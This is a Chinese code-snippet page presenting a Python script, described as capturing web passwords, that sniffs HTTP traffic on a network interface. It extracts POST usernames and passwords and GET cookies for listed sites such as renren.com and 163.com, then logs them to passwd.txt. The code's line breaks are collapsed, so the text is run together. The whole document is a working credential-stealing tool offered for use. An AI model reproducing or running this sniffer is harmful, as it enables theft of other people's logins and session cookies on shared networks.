Python 捕获web密码的程序,python捕获web密码,能够抓取POST的用户名


能够抓取POST的用户名、密码,以及一些GET的cookie

# -*- coding: utf8 -*-#!/usr/bin/env pythonimport pcapimport dpktdev='eth0'filter='tcp dst port 80'pc=pcap.pcap(dev) #注,参数可为网卡名,如eth0pc.setfilter(filter)    #设置监听过滤器hostlist=['xiaonei.com', 'renren.com', '163.com', '126.com', 'cublog.cn', 'itlong.com']file=open('passwd.txt','w')for ptime,pdata in pc:    #ptime为收到时间,pdata为收到数据    ether=dpkt.ethernet.Ethernet(pdata)    ip=ether.data    tcp=ip.data    content_len=len(tcp)-8    host=''    username=''    password=''    cookie=''    geturl=''    posturl=''    username_pattern=''    password_pattern=''    #Only Process POST Packet#    if tcp.data.find('POST')==-1 or tcp.data.find('GET')==-1:#        continue    #Get Host    host_start=tcp.data.find('Host: ')    if host_start != -1:        host_end=tcp.data.find('\\r\\n', host_start)        if host_end != -1:            host=tcp.data[host_start:host_end]            #print host        else:            continue    else:        continue    #Check host in hostlist    for _host in hostlist:        if host.find(_host)==-1:            continue        else:            print _host    #Get GET URL    geturl_start=tcp.data.find('GET ')    if geturl_start!=-1:        geturl_end=tcp.data.find('\\r\\n', geturl_start)        if geturl_end!=-1:            geturl=tcp.data[geturl_start:geturl_end]            #print geturl    #Pass picture    if geturl.find('gif')!=-1 or geturl.find('png')!=-1 or geturl.find('jpg')!=-1:        continue;    #Get POST URL    posturl_start=tcp.data.find('POST ')    if posturl_start!=-1:        posturl_end=tcp.data.find('\\r\\n', posturl_start)        if posturl_end!=-1:            posturl=tcp.data[posturl_start:posturl_end]            #print posturl    #Get Cookie    cookie_start=tcp.data.find('Cookie: ')    if cookie_start!=-1:        cookie_end=tcp.data.find('\\r\\n', cookie_start)        if cookie_end != -1:            cookie=tcp.data[cookie_start:cookie_end]            #print cookie    #Compute username_pattern    if host.find('xiaonei.com')!=-1 or host.find('renren.com')!=-1:        username_pattern='email='    elif host.find('lilacbbs.com')!=-1:        username_pattern='userid='    elif host.find('sso.itlong.com')!=-1:        username_pattern='login_name='    else:        username_pattern='username='    #Find UserName    username_start=tcp.data.find(username_pattern)    if username_start!=-1:        username_end=tcp.data.find('&', username_start)        if username_end!=-1:            username=tcp.data[username_start:username_end]            #print username        else:            continue        #Find Password        password_start=tcp.data.find('password=')        if password_start!=-1:            password_end=tcp.data.find('&', password_start)            if password_end!=-1:                password=tcp.data[password_start:password_end]                #print password        else:            continue    #Log to file    if host and posturl and username and password:        file.write('-----------------------\\n')        file.write(host+'\\n')        file.write(posturl+'\\n')        file.write(username+'\\n')        file.write(password+'\\n')        file.flush()    elif host and geturl and cookie:        file.write('-----------------------\\n')        file.write(host+'\\n')        file.write(geturl+'\\n')        file.write(cookie+'\\n')        file.flush()#该片段来自于http://byrx.net

评论关闭